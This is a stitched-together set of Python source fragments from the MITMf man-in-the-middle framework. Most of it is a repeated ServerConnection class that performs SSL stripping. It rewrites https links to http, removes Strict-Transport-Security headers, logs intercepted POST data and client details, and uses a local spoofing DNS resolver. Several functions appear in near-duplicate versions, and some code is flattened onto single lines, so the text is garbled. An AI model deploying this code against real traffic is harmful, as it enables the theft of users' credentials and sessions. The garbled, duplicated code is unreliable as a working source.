def connectionMade(self):
    """Replay the intercepted client request to the real server."""
    mitmf_logger.debug("[ServerConnection] HTTP connection made.")

    # Let plugins inspect/modify the outgoing request before it is sent.
    ProxyPlugins.getInstance().hook()

    self.sendRequest()
    self.sendHeaders()

    if self.command == 'POST':
        self.sendPostData()
def handleEndHeaders(self):
    """Finish relaying the response headers to the client."""
    # Image bodies pass through untouched, so the original length is still valid.
    if self.isImageRequest and self.contentLength is not None:
        self.client.setHeader("Content-Length", self.contentLength)

    if self.length == 0:
        self.shutdown()

    # Plugins get a look at the fully-assembled response headers.
    ProxyPlugins.getInstance().hook()

    if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
        for name, val in self.client.headers.iteritems():
            mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(name, val))
def getPluginStatus(plugin):
    # example: http://127.0.0.1:9090/cachekill
    """Return JSON "1" when *plugin* is currently active, "0" otherwise."""
    active = any(p.name == plugin for p in ProxyPlugins.getInstance().plist)
    return json.dumps("1" if active else "0")
def getPlugins():
    # example: http://127.0.0.1:9090/
    """Return a JSON object mapping every known plugin name to its activation state."""
    # Activated plugins first, then fill in the rest as inactive.
    pdict = dict((p.name, True) for p in ProxyPlugins.getInstance().plist)
    for p in ProxyPlugins.getInstance().plist_all:
        pdict.setdefault(p.name, False)
    return json.dumps(pdict)
def getPluginStatus(plugin):
    # example: http://127.0.0.1:9090/cachekill
    """Report whether *plugin* is loaded: JSON "1" when active, "0" otherwise."""
    enabled = any(p.name == plugin for p in ProxyPlugins().plugin_list)
    return json.dumps("1" if enabled else "0")
def getPlugins():
    # example: http://127.0.0.1:9999/
    """Return a JSON object mapping every known plugin name to True/False (loaded)."""
    status = dict((p.name, True) for p in ProxyPlugins().plugin_list)
    # Anything not already marked as loaded is reported as inactive.
    for p in ProxyPlugins().all_plugins:
        status.setdefault(p.name, False)
    return json.dumps(status)
def __init__(self, command, uri, postData, headers, client):
    """Capture the intercepted client request so it can be replayed upstream."""
    self.command = command
    self.uri = uri
    self.postData = postData
    self.headers = headers
    self.client = client

    # Per-request bookkeeping.
    self.clientInfo = {}
    self.plugins = ProxyPlugins()

    monitor = URLMonitor.getInstance()
    self.urlMonitor = monitor
    self.hsts = monitor.hsts
    self.app = monitor.app

    # Response-parsing state, filled in as headers arrive.
    self.isImageRequest = False
    self.isCompressed = False
    self.contentLength = None
    self.shutdownComplete = False
    # Set True by plugins that want to suppress POST-data logging.
    self.handle_post_output = False
def handleStatus(self, version, code, message):
    """Relay the status line after plugins have had a chance to rewrite it."""
    values = ProxyPlugins.getInstance().hook()
    version, code, message = values['version'], values['code'], values['message']

    mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
    self.client.setResponseCode(int(code), message)
def setPluginStatus(plugin, status):
    # example: http://127.0.0.1:9090/cachekill/1  # enabled
    # example: http://127.0.0.1:9090/cachekill/0  # disabled
    """Enable ("1") or disable ("0") *plugin*; return a JSON success/failed reply."""
    success = json.dumps({"plugin": plugin, "response": "success"})

    if status == "1":
        for candidate in ProxyPlugins().all_plugins:
            if candidate.name == plugin and candidate not in ProxyPlugins().plugin_list:
                ProxyPlugins().addPlugin(candidate)
                return success
    elif status == "0":
        for candidate in ProxyPlugins().plugin_list:
            if candidate.name == plugin:
                ProxyPlugins().removePlugin(candidate)
                return success

    # Unknown plugin, unknown status code, or state already as requested.
    return json.dumps({"plugin": plugin, "response": "failed"})
def __init__(self, channel, queued, reactor=reactor):
    """Wire this stripping request up to the shared singleton helpers."""
    Request.__init__(self, channel, queued)
    self.reactor = reactor

    monitor = URLMonitor.getInstance()
    self.urlMonitor = monitor
    self.hsts = monitor.isHstsBypass()
    self.cookieCleaner = CookieCleaner.getInstance()
    self.dnsCache = DnsCache.getInstance()
    self.plugins = ProxyPlugins.getInstance()

    # Use our own DNS server instead of reactor.resolve()
    self.resolver = monitor.getResolver()
    self.customResolver = dns.resolver.Resolver()
    self.customResolver.nameservers = ['127.0.0.1']
    self.customResolver.port = monitor.getResolverPort()
def __init__(self, command, uri, postData, headers, client):
    """Store the intercepted request and the shared singleton helpers."""
    self.command = command
    self.uri = uri
    self.postData = postData
    self.headers = headers
    self.client = client
    self.clientInfo = None

    monitor = URLMonitor.getInstance()
    self.urlMonitor = monitor
    self.hsts = monitor.isHstsBypass()
    self.app = monitor.isAppCachePoisoning()
    self.plugins = ProxyPlugins.getInstance()

    # Response-parsing state, updated as headers arrive.
    self.isImageRequest = False
    self.isCompressed = False
    self.contentLength = None
    self.shutdownComplete = False
def setPluginStatus(plugin, status):
    # example: http://127.0.0.1:9090/cachekill/1  # enabled
    # example: http://127.0.0.1:9090/cachekill/0  # disabled
    """Toggle *plugin* on ("1") or off ("0"); reply with a JSON status object."""
    success = json.dumps({"plugin": plugin, "response": "success"})
    mgr = ProxyPlugins.getInstance()

    if status == "1":
        for p in mgr.plist_all:
            if p.name == plugin and p not in mgr.plist:
                mgr.addPlugin(p)
                return success
    elif status == "0":
        for p in mgr.plist:
            if p.name == plugin:
                mgr.removePlugin(p)
                return success

    # Unknown plugin, unknown status code, or state already as requested.
    return json.dumps({"plugin": plugin, "response": "failed"})
def handleResponse(self, data):
    """Decompress, strip secure links, run plugins, then deliver the body."""
    if self.isCompressed:
        mitmf_logger.debug("[ServerConnection] Decompressing content...")
        data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

    data = self.replaceSecureLinks(data)
    # Plugins get the final say over the response body.
    data = ProxyPlugins.getInstance().hook()['data']

    mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))

    if self.contentLength is not None:
        self.client.setHeader('Content-Length', len(data))

    # Best-effort delivery: the client may already have gone away.
    try:
        self.client.write(data)
    except:
        pass

    try:
        self.shutdown()
    except:
        mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
if getattr(args, p.optname): p.initialize(args) load.append(p) if vars(args)[p.optname] is True: if hasattr(p, 'tree_output') and p.tree_output: for line in p.tree_output: print "| |_ %s" % line except Exception, e: print "[-] Error loading plugin %s: %s" % (p.name, str(e)) #Plugins are ready to go, start MITMf if args.disproxy: ProxyPlugins.getInstance().setPlugins(load) else: from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor from libs.dnschef.dnschef import DNSChef URLMonitor.getInstance().setFaviconSpoofing(args.favicon) URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver']) URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port']) DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS']) if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on': DNSChef.getInstance().startTCP() else: DNSChef.getInstance().startUDP()
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor

# Configure the shared singletons from the parsed command-line options.
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)

# Every inbound connection is handled by the stripping proxy protocol.
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy

reactor.listenTCP(options.listen_port, strippingFactory)

# Make the full plugin catalogue visible to the plugin manager.
ProxyPlugins().all_plugins = plugins

print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
for plugin in plugins:

    #load only the plugins that have been called at the command line
    if vars(options)[plugin.optname] is True:

        ProxyPlugins().add_plugin(plugin)

        print "|_ {} v{}".format(plugin.name, plugin.version)
        if plugin.tree_info:
            # NOTE(review): pop() drains tree_info while printing (in reverse
            # order) — assumes the list is not needed afterwards; confirm.
            for line in xrange(0, len(plugin.tree_info)):
                print "| |_ {}".format(plugin.tree_info.pop())

        plugin.setup_logger()
def shutdown(message=None):
    """Run every active plugin's cleanup hook, then terminate the process."""
    for active in ProxyPlugins.getInstance().plist:
        active.finish()
    sys.exit(message)
class ServerConnection(HTTPClient):
    '''
    The server connection is where we do the bulk of the stripping. Everything
    that comes back from the real server is examined here: security headers we
    don't want are removed, and https:// links are rewritten to http://.
    '''

    # Matches any https:// reference so it can be downgraded.
    urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    urlType = re.compile(r"https://", re.IGNORECASE)
    # https://host:port/ — used to drop the explicit port when downgrading.
    urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
    urlTypewww = re.compile(r"https://www", re.IGNORECASE)
    urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
    urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
    urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
    #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        '''Store the intercepted client request so it can be replayed upstream.'''
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client
        self.clientInfo = {}
        self.plugins = ProxyPlugins()
        self.urlMonitor = URLMonitor.getInstance()
        self.hsts = URLMonitor.getInstance().hsts
        self.app = URLMonitor.getInstance().app
        # Response-parsing state, updated as headers arrive.
        self.isImageRequest = False
        self.isCompressed = False
        self.contentLength = None
        self.shutdownComplete = False
        # Set True by plugins that want to suppress POST-data logging.
        self.handle_post_output = False

    def sendRequest(self):
        '''Send the request line upstream (GET hosts are logged per client).'''
        if self.command == 'GET':
            clientlog.info(self.headers['host'], extra=self.clientInfo)

        log.debug("Full request: {}{}".format(self.headers['host'], self.uri))
        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        '''Relay the client's request headers upstream unchanged.'''
        for header, value in self.headers.iteritems():
            log.debug("Sending header: ({}: {})".format(header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
        '''Log the request body when it is printable, then forward it.'''
        if self.handle_post_output is False: #So we can disable printing POST data coming from plugins
            try:
                postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
                if len(postdata) > 0:
                    clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
            except Exception as e:
                # NOTE(review): ('A' or 'B') evaluates to 'A', so this only
                # tests for 'UnicodeDecodeError' in e.message — confirm intent.
                if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
                    log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))

        self.handle_post_output = False
        self.transport.write(self.postData)

    def connectionMade(self):
        '''Fingerprint the client from its User-Agent, then replay the request.'''
        log.debug("HTTP connection made.")

        try:
            user_agent = parse(self.headers['user-agent'])

            self.clientInfo["clientos"] = user_agent.os.family
            self.clientInfo["browser"] = user_agent.browser.family
            try:
                self.clientInfo["browserv"] = user_agent.browser.version[0]
            except IndexError:
                # Parser gave no version components.
                self.clientInfo["browserv"] = "Other"
        except KeyError:
            # No User-Agent header at all.
            self.clientInfo["clientos"] = "Other"
            self.clientInfo["browser"] = "Other"
            self.clientInfo["browserv"] = "Other"

        self.clientInfo["clientip"] = self.client.getClientIP()

        self.plugins.hook()
        self.sendRequest()
        self.sendHeaders()

        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):
        '''Pass the status line through the plugin hook, then to the client.'''
        values = self.plugins.hook()

        version = values['version']
        code = values['code']
        message = values['message']

        log.debug("Server response: {} {} {}".format(version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        '''Inspect each response header: downgrade redirects, strip HSTS, track type/encoding/length.'''
        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)
            if self.app:
                self.urlMonitor.addRedirection(self.client.uri, value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                log.debug("Response is image content, not scanning")

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                log.debug("Response is compressed")
                self.isCompressed = True

        elif (key.lower()== 'strict-transport-security'):
            # Dropping this header is what lets the HTTPS->HTTP downgrade stick.
            clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo)

        elif (key.lower() == 'content-length'):
            # The body may be rewritten later, so hold the length back for now.
            self.contentLength = value

        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)

        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
        '''Finalize the headers sent to the client and run the plugin hook.'''
        if (self.isImageRequest and self.contentLength != None):
            self.client.setHeader("Content-Length", self.contentLength)

        # NOTE(review): indentation reconstructed from a mangled source —
        # these cache-busting headers appear to be unconditional; confirm.
        self.client.setHeader("Expires", "0")
        self.client.setHeader("Cache-Control", "No-Cache")

        if self.length == 0:
            self.shutdown()

        self.plugins.hook()

        if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
            for header, value in self.client.headers.iteritems():
                log.debug("Receiving header: ({}: {})".format(header, value))

    def handleResponsePart(self, data):
        '''Stream image bodies straight through; buffer everything else.'''
        if (self.isImageRequest):
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        '''Close out the response; image bodies were already streamed.'''
        if (self.isImageRequest):
            self.shutdown()
        else:
            #Gets rid of some generic errors
            try:
                HTTPClient.handleResponseEnd(self)
            except:
                pass

    def handleResponse(self, data):
        '''Decompress, strip secure links, run plugins, then write the body out.'''
        if (self.isCompressed):
            log.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        data = self.replaceSecureLinks(data)
        # Plugins get the final say over the response body.
        data = self.plugins.hook()['data']

        #log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
        log.debug("Read from server {} bytes of data".format(len(data)))

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        # Best-effort delivery: the client may already have disconnected.
        try:
            self.client.write(data)
        except:
            pass

        try:
            self.shutdown()
        except:
            log.info("Client connection dropped before request finished.")

    def replaceSecureLinks(self, data):
        '''Rewrite https:// references in *data* to http:// (HSTS-aware when enabled).'''
        if self.hsts:
            sustitucion = {}
            patchDict = self.urlMonitor.patchDict
            if patchDict:
                # Apply previously-recorded hostname patches in one pass.
                dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
                data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)

            iterator = re.finditer(ServerConnection.urlExpression, data)
            for match in iterator:
                url = match.group()

                log.debug("Found secure reference: " + url)
                nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
                log.debug("Replacing {} => {}".format(url,nuevaurl))
                sustitucion[url] = nuevaurl

            if sustitucion:
                dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
                data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)

            return data
        else:
            iterator = re.finditer(ServerConnection.urlExpression, data)
            for match in iterator:
                url = match.group()

                log.debug("Found secure reference: " + url)

                url = url.replace('https://', 'http://', 1)
                # NOTE(review): this replace is a no-op as written ('&' -> '&');
                # it presumably decoded from '&amp;' -> '&' originally — confirm.
                url = url.replace('&', '&')
                self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)

            data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
            return re.sub(ServerConnection.urlType, 'http://', data)

    def shutdown(self):
        '''Finish the client response and drop the upstream transport (idempotent).'''
        if not self.shutdownComplete:
            self.shutdownComplete = True

            try:
                self.client.finish()
                self.transport.loseConnection()
            except:
                pass
class ServerConnection(HTTPClient):
    '''
    The server connection is where we do the bulk of the stripping. Everything
    that comes back from the real server is examined here: security headers we
    don't want are removed, and https:// links are rewritten to http://.
    '''

    # Matches any https:// reference so it can be downgraded.
    urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    urlType = re.compile(r"https://", re.IGNORECASE)
    # https://host:port/ — used to drop the explicit port when downgrading.
    urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
    urlTypewww = re.compile(r"https://www", re.IGNORECASE)
    urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
    urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
    urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
    #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        '''Store the intercepted client request so it can be replayed upstream.'''
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client
        self.clientInfo = {}
        self.plugins = ProxyPlugins()
        self.urlMonitor = URLMonitor.getInstance()
        self.hsts = URLMonitor.getInstance().hsts
        self.app = URLMonitor.getInstance().app
        # Response-parsing state, updated as headers arrive.
        self.isImageRequest = False
        self.isCompressed = False
        self.contentLength = None
        self.shutdownComplete = False
        # Set True by plugins that want to suppress POST-data logging.
        self.handle_post_output = False

    def sendRequest(self):
        '''Send the request line upstream (GET hosts are logged per client).'''
        if self.command == 'GET':
            clientlog.info(self.headers['host'], extra=self.clientInfo)

        log.debug("Full request: {}{}".format(self.headers['host'], self.uri))
        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        '''Relay the client's request headers upstream unchanged.'''
        for header, value in self.headers.iteritems():
            log.debug("Sending header: ({}: {})".format(header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
        '''Log the request body when it is printable, then forward it.'''
        if self.handle_post_output is False: #So we can disable printing POST data coming from plugins
            try:
                postdata = self.postData.decode( 'utf8' ) #Anything that we can't decode to utf-8 isn't worth logging
                if len(postdata) > 0:
                    clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
            except Exception as e:
                # NOTE(review): ('A' or 'B') evaluates to 'A', so this only
                # tests for 'UnicodeDecodeError' in e.message — confirm intent.
                if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
                    log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))

        self.handle_post_output = False
        self.transport.write(self.postData)

    def connectionMade(self):
        '''Fingerprint the client from its User-Agent, then replay the request.'''
        log.debug("HTTP connection made.")

        try:
            user_agent = parse(self.headers['user-agent'])

            self.clientInfo["clientos"] = user_agent.os.family
            self.clientInfo["browser"] = user_agent.browser.family
            try:
                self.clientInfo["browserv"] = user_agent.browser.version[0]
            except IndexError:
                # Parser gave no version components.
                self.clientInfo["browserv"] = "Other"
        except KeyError:
            # No User-Agent header at all.
            self.clientInfo["clientos"] = "Other"
            self.clientInfo["browser"] = "Other"
            self.clientInfo["browserv"] = "Other"

        self.clientInfo["clientip"] = self.client.getClientIP()

        self.plugins.hook()
        self.sendRequest()
        self.sendHeaders()

        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):
        '''Pass the status line through the plugin hook, then to the client.'''
        values = self.plugins.hook()

        version = values['version']
        code = values['code']
        message = values['message']

        log.debug("Server response: {} {} {}".format(version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        '''Inspect each response header: downgrade redirects, strip HSTS, track type/encoding/length.'''
        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)
            if self.app:
                self.urlMonitor.addRedirection(self.client.uri, value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                log.debug("Response is image content, not scanning")

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                log.debug("Response is compressed")
                self.isCompressed = True

        elif (key.lower() == 'strict-transport-security'):
            # Dropping this header is what lets the HTTPS->HTTP downgrade stick.
            clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo)

        elif (key.lower() == 'content-length'):
            # The body may be rewritten later, so hold the length back for now.
            self.contentLength = value

        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)

        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
        '''Finalize the headers sent to the client and run the plugin hook.'''
        if (self.isImageRequest and self.contentLength != None):
            self.client.setHeader("Content-Length", self.contentLength)

        # NOTE(review): indentation reconstructed from a mangled source —
        # these cache-busting headers appear to be unconditional; confirm.
        self.client.setHeader("Expires", "0")
        self.client.setHeader("Cache-Control", "No-Cache")

        if self.length == 0:
            self.shutdown()

        self.plugins.hook()

        if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
            for header, value in self.client.headers.iteritems():
                log.debug("Receiving header: ({}: {})".format(header, value))

    def handleResponsePart(self, data):
        '''Stream image bodies straight through; buffer everything else.'''
        if (self.isImageRequest):
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        '''Close out the response; image bodies were already streamed.'''
        if (self.isImageRequest):
            self.shutdown()
        else:
            #Gets rid of some generic errors
            try:
                HTTPClient.handleResponseEnd(self)
            except:
                pass

    def handleResponse(self, data):
        '''Decompress, strip secure links, run plugins, then write the body out.'''
        if (self.isCompressed):
            log.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        data = self.replaceSecureLinks(data)
        # Plugins get the final say over the response body.
        data = self.plugins.hook()['data']

        #log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
        log.debug("Read from server {} bytes of data".format(len(data)))

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        # Best-effort delivery: the client may already have disconnected.
        try:
            self.client.write(data)
        except:
            pass

        try:
            self.shutdown()
        except:
            log.info("Client connection dropped before request finished.")

    def replaceSecureLinks(self, data):
        '''Rewrite https:// references in *data* to http:// (HSTS-aware when enabled).'''
        if self.hsts:
            sustitucion = {}
            patchDict = self.urlMonitor.patchDict
            if patchDict:
                # Apply previously-recorded hostname patches in one pass.
                dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
                data = dregex.sub(lambda x: str(patchDict[x.string[x.start():x.end()]]), data)

            iterator = re.finditer(ServerConnection.urlExpression, data)
            for match in iterator:
                url = match.group()

                log.debug("Found secure reference: " + url)
                nuevaurl = self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
                log.debug("Replacing {} => {}".format(url, nuevaurl))
                sustitucion[url] = nuevaurl

            if sustitucion:
                dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
                data = dregex.sub(lambda x: str(sustitucion[x.string[x.start():x.end()]]), data)

            return data
        else:
            iterator = re.finditer(ServerConnection.urlExpression, data)
            for match in iterator:
                url = match.group()

                log.debug("Found secure reference: " + url)

                url = url.replace('https://', 'http://', 1)
                # NOTE(review): this replace is a no-op as written ('&' -> '&');
                # it presumably decoded from '&amp;' -> '&' originally — confirm.
                url = url.replace('&', '&')
                self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)

            data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
            return re.sub(ServerConnection.urlType, 'http://', data)

    def shutdown(self):
        '''Finish the client response and drop the upstream transport (idempotent).'''
        if not self.shutdownComplete:
            self.shutdownComplete = True

            try:
                self.client.finish()
                self.transport.loseConnection()
            except:
                pass
#load only the plugins that have been called at the command line if vars(args)[p.optname] is True: print "|_ {} v{}".format(p.name, p.version) if p.tree_info: for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) p.initialize(args) if p.tree_info: for line in xrange(0, len(p.tree_info)): print "| |_ {}".format(p.tree_info.pop()) ProxyPlugins.getInstance().addPlugin(p) #Plugins are ready to go, let's rock & roll from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor URLMonitor.getInstance().setFaviconSpoofing(args.favicon) CookieCleaner.getInstance().setEnabled(args.killsessions) strippingFactory = http.HTTPFactory(timeout=10) strippingFactory.protocol = StrippingProxy reactor.listenTCP(args.listen, strippingFactory) for p in ProxyPlugins.getInstance().plist:
def shutdown(message=None):
    """Notify every loaded plugin of shutdown, then terminate the process."""
    for loaded in ProxyPlugins().plugin_list:
        loaded.on_shutdown()
    sys.exit(message)